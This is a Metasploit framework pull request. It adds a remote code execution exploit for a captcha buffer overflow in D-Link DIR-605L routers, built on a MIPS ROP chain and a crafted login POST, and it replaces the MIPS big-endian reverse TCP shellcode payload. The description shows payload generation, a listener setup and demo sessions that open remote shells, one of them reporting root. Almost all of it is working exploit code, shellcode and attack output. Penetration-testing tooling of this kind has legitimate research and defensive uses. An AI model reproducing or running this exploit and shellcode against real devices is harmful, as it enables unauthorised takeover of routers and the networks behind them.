### PR TITLE
Add exploit for OSVDB 86824 D-Link DIR605L captcha buffer overflow

### DIFF
--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -47,8 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'DLink DIR-605L 1.13',
             {
               'Offset'      => 94,
-              'LibcBase'    => 0x4212e000, # QEMU environment
-              'ApmibBase'   => 0x42095000, # QEMU environment
+              'LibcBase'    => 0x2ab86000, # According to Original Exploit by Craig Heffner
+              'ApmibBase'   => 0x2aaef000, # According to Original Exploit by Craig Heffner
+              #'LibcBase'    => 0x4212e000, # QEMU environment
+              #'ApmibBase'   => 0x42095000, # QEMU environment
               #LOAD:000248D4  li      $a0, 1   ; set $a0 for the sleep() call
               #LOAD:000248D8  move    $t9, $s1 ; $s1 is controlled after the overflow
               #LOAD:000248DC  jalr    $t9

--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -1,0 +1,127 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  HttpFingerprint = { :pattern => [ /Boa/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link DIR-605L Captcha Handling Buffer Overflow',
+      'Description'    => %q{
+          This module exploits an anonymous remote code execution on D-Link DIR-605L routers. The
+        vulnerability exists while handling user supplied captcha information, and is due to the
+        insecure usage of sprintf on the getAuthCode() function. This module has been tested
+        successfully on DLink DIR-605L Firmware 1.13 under a QEMU environment.
+      },
+      'Author'         =>
+        [
+          'Craig Heffner', # Vulnerability discovery, original exploit
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 3000,
+          'BadChars'    => "\x00\x67\x26\x2b"
+        },
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_MIPSBE,
+      'References'     =>
+        [
+          [ 'OSVDB', '86824' ],
+          [ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'DLink DIR-605L 1.13',
+            {
+              'Offset'      => 94,
+              'LibcBase'    => 0x4212e000, # QEMU environment
+              'ApmibBase'   => 0x42095000, # QEMU environment
+              #LOAD:000248D4  li      $a0, 1   ; set $a0 for the sleep() call
+              #LOAD:000248D8  move    $t9, $s1 ; $s1 is controlled after the overflow
+              #LOAD:000248DC  jalr    $t9
+              'Ret'         => 0x248D4, # from libc
+              #LOAD:0002B954  move    $t9, $s2 # Controlled
+              #LOAD:0002B958  lw      $ra, 0x30+var_4($sp)  # allows to get controlled $ra from the stack
+              #LOAD:0002B95C  lw      $s4, 0x30+var_8($sp)
+              #LOAD:0002B960  lw      $s3, 0x30+var_C($sp)
+              #LOAD:0002B964  lw      $s2, 0x30+var_10($sp)
+              #LOAD:0002B968  lw      $s1, 0x30+var_14($sp) # allows to get controlled $s1 from the stack
+              #LOAD:0002B96C  lw      $s0, 0x30+var_18($sp)
+              #LOAD:0002B970  jr      $t9
+              'RopJmpSleep' => 0x2B954, # from libc
+              'RopSleep'    => 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache
+              #LOAD:000027E8  move    $t9, $s1 # Controlled
+              #LOAD:000027EC  jalr    $t9 ; sub_22D0
+              #LOAD:000027F0  addiu   $a2, $sp, 0x40+var_24 ; put pointer to the stack on $a2 # executed because of pipelining
+              'RopPtrStack' => 0x027E8, # from apmi
+              #LOAD:00001D78  move    $t9, $a2 ; $a2 contains a poiner to the stack
+              #LOAD:00001D7C  jalr    $t9
+              'RopJmpStack' => 0x01D78 # from apmi
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Oct 08 2012',
+      'DefaultTarget' => 0))
+
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => '/comm.asp' })
+    if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
+      return Exploit::CheckCode::Detected
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    shellcode = ""
+    shellcode << rand_text(target['Offset'])                             # Padding
+    shellcode << rand_text(4)                                            # $s0
+    shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N")  # $s1
+    shellcode << [target['LibcBase'] + target['RopSleep']].pack("N")     # $s2
+    shellcode << rand_text(4)                                            # $s3
+    shellcode << [target['LibcBase'] + target.ret].pack("N")             # $ra
+    shellcode << rand_text(0x1c)                                         # filler
+    shellcode << rand_text(4)                                            # $s0
+    shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N") # $s1
+    shellcode << rand_text(4)                                            # $s2
+    shellcode << rand_text(4)                                            # $s3
+    shellcode << rand_text(4)                                            # $s4
+    shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N") # $ra
+    shellcode << rand_text(0x1c)                                         # filler
+    shellcode << payload.encoded                                         # shellcode
+
+    print_status("#{peer} - Sending exploit...")
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => "/goform/formLogin",
+      'encode_params' => false,
+      'vars_post' => {
+        'VERIFICATION_CODE' => 'myvoiceismypassportverifyme',
+        'VER_CODE'          => '1234',
+        'login_n'           => 'admin',
+        'FILECODE'          =>  shellcode,
+        'curTime'           => '1348588030496',
+        'login_pass'        => 'Zm9vb255b3UA',
+        'login_name'        => 'admin'
+      }
+    })
+
+  end
+
+end

--- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
+++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ManualRanking # Because only has been tested on a QEMU emulated environment
 
   HttpFingerprint = { :pattern => [ /Boa/ ] }
 

--- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
@@ -5,8 +5,6 @@
 #   http://metasploit.com/
 ##
 
-# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org)
-
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
@@ -22,7 +20,15 @@ module Metasploit3
     super(merge_info(info,
       'Name'          => 'Linux Command Shell, Reverse TCP Inline',
       'Description'   => 'Connect back to attacker and spawn a command shell',
-      'Author'        => 'Julien Tinnes',
+      'Author'        =>
+        [
+          'rigan <imrigan[at]gmail.com>', # Original shellcode
+          'juan vazquez' # Metasploit module
+        ],
+      'References'    =>
+        [
+          'EDB' => '18226',
+        ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_MIPSBE,
@@ -48,79 +54,70 @@ module Metasploit3
     port = [port].pack("n").unpack("cc")
 
     shellcode =
-      "\x24\x09\xff\xef" +                    # li	t1,-17
-      "\x05\x10\xff\xff" +                    # bltzal	t0,0x4
-      "\x28\x08\x82\x82" +                    # slti	t0,zero,-32126
-      "\x01\x20\x48\x27" +                    # nor	t1,t1,zero
-      "\x01\x3f\xc8\x21" +                    # addu	t9,t1,ra
-      "\xaf\xb9\x85\x48" +                    # sw	t9,-31416(sp)
-      "\x23\xb9\x85\x48" +                    # addi	t9,sp,-31416
-      "\x3c\x1c\x00\x00" +                    # lui	gp,0x0
-      "\x27\x9c\x00\x00" +                    # addiu	gp,gp,0
-      "\x03\x99\xe0\x21" +                    # addu	gp,gp,t9
-      "\x27\xbd\xff\xd0" +                    # addiu	sp,sp,-48
-      "\xaf\xbc\x00\x00" +                    # sw	gp,0(sp)
-      "\xaf\xbc\x00\x28" +                    # sw	gp,40(sp)
-      "\x8f\x84\x00\x00" +                    # lw	a0,0(gp)
-      "\x00\x00\x00\x00" +                    # nop
-      "\x24\x84\x00\xf8" +                    # addiu	a0,a0,248
-      "\x00\x00\x00\x00" +                    # nop
-      "\x8c\x85\x00\x00" +                    # lw	a1,0(a0)
-      "\x8c\x87\x00\x04" +                    # lw	a3,4(a0)
-      "\x3c\x08" + host[0..1].pack("C2") +    # lui	t0,0xc0a8
-      "\x35\x06" + host[2..3].pack("C2") +    # ori	a2,t0,0x109
-      "\x27\xb9\x00\x18" +                    # addiu	t9,sp,24
-      "\x24\x03\x00\x02" +                    # li	v1,2
-      "\x24\x02" + port.pack("C2") +          # li	v0,4646
-      "\xaf\xa5\x00\x18" +                    # sw	a1,24(sp)
-      "\xaf\xa6\x00\x0c" +                    # sw	a2,12(sp)
-      "\xaf\xa7\x00\x1c" +                    # sw	a3,28(sp)
-      "\xa7\xa3\x00\x08" +                    # sh	v1,8(sp)
-      "\xa7\xa2\x00\x0a" +                    # sh	v0,10(sp)
-      "\xaf\xb9\x00\x20" +                    # sw	t9,32(sp)
-      "\xaf\xa0\x00\x24" +                    # sw	zero,36(sp)
-      "\x24\x04\x00\x02" +                    # li	a0,2
-      "\x24\x05\x00\x02" +                    # li	a1,2
-      "\x00\x00\x30\x21" +                    # move	a2,zero
-      "\x24\x02\x10\x57" +                    # li	v0,4183
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x24\x04\xff\xff" +                    # li	a0,-1
-      "\x10\x44\x00\x1a" +                    # beq	v0,a0,0x100
-      "\x00\x40\x18\x21" +                    # move	v1,v0
-      "\x00\x60\x20\x21" +                    # move	a0,v1
-      "\x24\x06\x00\x10" +                    # li	a2,16
-      "\x27\xa5\x00\x08" +                    # addiu	a1,sp,8
-      "\x24\x02\x10\x4a" +                    # li	v0,4170
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x14\x40\x00\x0e" +                    # bnez	v0,0xec
-      "\x00\x00\x28\x21" +                    # move	a1,zero
-      "\x24\x02\x0f\xdf" +                    # li	v0,4063
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x24\x05\x00\x01" +                    # li	a1,1
-      "\x24\x02\x0f\xdf" +                    # li	v0,4063
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x24\x05\x00\x02" +                    # li	a1,2
-      "\x24\x02\x0f\xdf" +                    # li	v0,4063
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x03\x20\x20\x21" +                    # move	a0,t9
-      "\x27\xa5\x00\x20" +                    # addiu	a1,sp,32
-      "\x00\x00\x30\x21" +                    # move	a2,zero
-      "\x24\x02\x0f\xab" +                    # li	v0,4011
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x00\x00\x20\x21" +                    # move	a0,zero
-      "\x24\x02\x0f\xa1" +                    # li	v0,4001
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x03\xe0\x00\x08" +                    # jr	ra
-      "\x27\xbd\x00\x30" +                    # addiu	sp,sp,48
-      "\x24\x04\x00\x01" +                    # li	a0,1
-      "\x24\x02\x0f\xa1" +                    # li	v0,4001
-      "\x00\x00\x00\x0c" +                    # syscall
-      "\x10\x00\xff\xe4" +                    # b	0xa0
-      "\x00\x60\x20\x21" +                    # move	a0,v1
-      "\x2f\x62\x69\x6e" +                    # "/bin"
-      "\x2f\x73\x68\x00" +                    # "/sh\x00"
-      "0"*80
-      # FIXME: remove extra 0 bytes!
+      # sys_socket
+      # a0: domain
+      # a1: type
+      # a2: protocol
+      "\x24\x0f\xff\xfa" + # li t7,-6
+      "\x01\xe0\x78\x27" + # nor t7,t7,zero
+      "\x21\xe4\xff\xfd" + # addi a0,t7,-3
+      "\x21\xe5\xff\xfd" + # addi a1,t7,-3
+      "\x28\x06\xff\xff" + # slti a2,zero,-1
+      "\x24\x02\x10\x57" + # li v0,4183 # sys_socket
+      "\x01\x01\x01\x0c" + # syscall 0x40404
+
+      # sys_connect
+      # a0: sockfd (stored on the stack)
+      # a1: addr (data stored on the stack)
+      # a2: addrlen
+      "\xaf\xa2\xff\xff" + # sw v0,-1(sp)
+      "\x8f\xa4\xff\xff" + # lw a0,-1(sp)
+      "\x34\x0f\xff\xfd" + # li t7,0xfffd
+      "\x01\xe0\x78\x27" + # nor t7,t7,zero
+      "\xaf\xaf\xff\xe0" + # sw t7,-32(sp)
+      "\x3c\x0e" + port.pack("C2") + # lui t6,0x1f90
+      "\x35\xce" + port.pack("C2") + # ori t6,t6,0x1f90
+      "\xaf\xae\xff\xe4" + # sw t6,-28(sp)
+      "\x3c\x0e" + host[0..1].pack("C2") + # lui t6,0x7f01
+      "\x35\xce" + host[2..3].pack("C2") + # ori t6,t6,0x101
+      "\xaf\xae\xff\xe6" + # sw t6,-26(sp)
+      "\x27\xa5\xff\xe2" + # addiu a1,sp,-30
+      "\x24\x0c\xff\xef" + # li t4,-17
+      "\x01\x80\x30\x27" + # nor a2,t4,zero
+      "\x24\x02\x10\x4a" + # li v0,4170  # sys_connect
+      "\x01\x01\x01\x0c" + # syscall 0x40404
+
+      # sys_dup2
+      # a0: oldfd (socket)
+      # a1: newfd (0, 1, 2)
+      "\x24\x0f\xff\xfd" + # li t7,-3
+      "\x01\xe0\x78\x27" + # nor t7,t7,zero
+      "\x8f\xa4\xff\xff" + # lw a0,-1(sp)
+      "\x01\xe0\x28\x21" + # move a1,t7
+      "\x24\x02\x0f\xdf" + # li v0,4063 # sys_dup2
+      "\x01\x01\x01\x0c" + # syscall 0x40404
+      "\x24\x10\xff\xff" + # li s0,-1
+      "\x21\xef\xff\xff" + # addi t7,t7,-1
+      "\x15\xf0\xff\xfa" + # bne t7,s0,68 <dup2_loop>
+
+      # sys_execve
+      # a0: filename (stored on the stack) "//bin/sh"
+      # a1: argv "//bin/sh"
+      # a2: envp (null)
+      "\x28\x06\xff\xff" + # slti a2,zero,-1
+      "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
+      "\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
+      "\xaf\xaf\xff\xec" + # sw t7,-20(sp)
+      "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
+      "\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
+      "\xaf\xae\xff\xf0" + # sw t6,-16(sp)
+      "\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
+      "\x27\xa4\xff\xec" + # addiu a0,sp,-20
+      "\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
+      "\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
+      "\x27\xa5\xff\xf8" + # addiu a1,sp,-8
+      "\x24\x02\x0f\xab" + # li v0,4011 # sys_execve
+      "\x01\x01\x01\x0c"  # syscall 0x40404
 
     return super + shellcode
   end


### PR DESCRIPTION
This pull request tries to add a metasploit port for the awesome Craig's work:

http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/

Basically:
- I'm changing the shell_reverse_tcp payload for MIPSBE. Mainly because it's a very big version of the payload, which includes lots of common badchars (and the only mips encoder available also needs work).

Old shell_reverse_tcp mipsbe payload:

```
Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload linux/mipsbe/shell_reverse_tcp LHOST=192.168.172.0 LPORT=4444 C 
/*
 * linux/mipsbe/shell_reverse_tcp - 364 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.172.0, LPORT=4444, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x24\x09\xff\xef\x05\x10\xff\xff\x28\x08\x82\x82\x01\x20\x48"
"\x27\x01\x3f\xc8\x21\xaf\xb9\x85\x48\x23\xb9\x85\x48\x3c\x1c"
"\x00\x00\x27\x9c\x00\x00\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf"
"\xbc\x00\x00\xaf\xbc\x00\x28\x8f\x84\x00\x00\x00\x00\x00\x00"
"\x24\x84\x00\xf8\x00\x00\x00\x00\x8c\x85\x00\x00\x8c\x87\x00"
"\x04\x3c\x08\xc0\xa8\x35\x06\xac\x00\x27\xb9\x00\x18\x24\x03"
"\x00\x02\x24\x02\x11\x5c\xaf\xa5\x00\x18\xaf\xa6\x00\x0c\xaf"
"\xa7\x00\x1c\xa7\xa3\x00\x08\xa7\xa2\x00\x0a\xaf\xb9\x00\x20"
"\xaf\xa0\x00\x24\x24\x04\x00\x02\x24\x05\x00\x02\x00\x00\x30"
"\x21\x24\x02\x10\x57\x00\x00\x00\x0c\x24\x04\xff\xff\x10\x44"
"\x00\x1a\x00\x40\x18\x21\x00\x60\x20\x21\x24\x06\x00\x10\x27"
"\xa5\x00\x08\x24\x02\x10\x4a\x00\x00\x00\x0c\x14\x40\x00\x0e"
"\x00\x00\x28\x21\x24\x02\x0f\xdf\x00\x00\x00\x0c\x24\x05\x00"
"\x01\x24\x02\x0f\xdf\x00\x00\x00\x0c\x24\x05\x00\x02\x24\x02"
"\x0f\xdf\x00\x00\x00\x0c\x03\x20\x20\x21\x27\xa5\x00\x20\x00"
"\x00\x30\x21\x24\x02\x0f\xab\x00\x00\x00\x0c\x00\x00\x20\x21"
"\x24\x02\x0f\xa1\x00\x00\x00\x0c\x03\xe0\x00\x08\x27\xbd\x00"
"\x30\x24\x04\x00\x01\x24\x02\x0f\xa1\x00\x00\x00\x0c\x10\x00"
"\xff\xe4\x00\x60\x20\x21\x2f\x62\x69\x6e\x2f\x73\x68\x00\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30";
```

New shell_reverse_tcp mipsbe payload:

```
Juans-MacBook-Pro:metasploit-framework juan$ git checkout mips_dlink_captcha
Switched to branch 'mips_dlink_captcha'
Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload linux/mipsbe/shell_reverse_tcp LHOST=192.168.172.0 LPORT=4444 C 
/*
 * linux/mipsbe/shell_reverse_tcp - 184 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.172.0, LPORT=4444, 
 * ReverseConnectRetries=5, ReverseAllowProxy=false, 
 * PrependFork=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff"
"\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2"
"\xff\xff\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf"
"\xaf\xff\xe0\x3c\x0e\x11\x5c\x35\xce\x11\x5c\xaf\xae\xff\xe4"
"\x3c\x0e\xc0\xa8\x35\xce\xac\x00\xaf\xae\xff\xe6\x27\xa5\xff"
"\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01"
"\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x78\x27\x8f\xa4\xff\xff\x01"
"\xe0\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff"
"\x21\xef\xff\xff\x15\xf0\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f"
"\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"
"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf"
"\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
"\x01\x01\x01\x0c";

```
- A port of the OSVDB 86824's exploit by Craig. My only worry is which I haven't had access to a real device for testing, so I've been able to just test on a QEMU environment. Because of that I'm using ManualRanking for it. If someone could help us to test it with real hardware I guess ranking could be upgraded :)

Verification
- Payload:
- [ ] Generate an ELF with the MIPSBE shell_reverse_tcp payload with msfpayload.

```
$ ./msfpayload linux/mipsbe/shell_reverse_tcp LHOST=192.168.172.1 LPORT=4444 X > /tmp/reverse_shell_mips.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsbe/shell_reverse_tcp
 Length: 184
Options: {"LHOST"=>"192.168.172.1", "LPORT"=>"4444"}
$ file /tmp/reverse_shell_mips.elf 
/tmp/reverse_shell_mips.elf: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size

```
- [ ] Run a exploit/multi/handler with a listener for the payload 

```
> use exploit/multi/handler 
msf exploit(handler) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...

```
- [ ] Execute the elf executable from a MIPSBE machine, I've used a debian squeeze emulated with qemu-system, you should enjoy a session

```
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.133:53337) at 2013-10-17 22:56:50 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux mipsdebian 2.6.32-5-4kc-malta #1 Sat Feb 16 12:43:42 UTC 2013 mips GNU/Linux

```
- Exploit
- [ ] Easy part: firmware (1.13) downloadable from here: ftp://ftp2.dlink.com/PRODUCTS/DIR-605L/REVA/DIR-605L_FIRMWARE_1.13.ZIP
- [ ] Not so easy part: Run the boa webserver included with the firmware with qemu (user emulation). Basically use the information provided on the awesome Craig's post: http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/
- [ ] Run msfconsole, exploit and hopefully enjoy your session :) 
- Exploit DEMO:

```
msf > use exploit/linux/http/dlink_dir605l_captcha_bof 
msf exploit(dlink_dir605l_captcha_bof) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(dlink_dir605l_captcha_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(dlink_dir605l_captcha_bof) > set lport 4444
lport => 4444
msf exploit(dlink_dir605l_captcha_bof) > show options

Module options (exploit/linux/http/dlink_dir605l_captcha_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   DLink DIR-605L 1.13


msf exploit(dlink_dir605l_captcha_bof) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(dlink_dir605l_captcha_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.133:80 - Sending exploit...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.133:53334) at 2013-10-17 22:33:43 -0500

pwd
/etc/boa
^C
Abort session 1? [y/N]  y

[*] 192.168.172.133 - Command shell session 1 closed.  Reason: User exit

```

**Known problems**: The decoder stub for the only one available mipsbe encoder contains exploit's badchars. So be sure to not include exploit's badchars on the LHOST and LPORT information for the shell_reverse_tcp payload or you won't be able to encode the payload and msfpayload will complain. Definitely need to work on MIPS encoders 
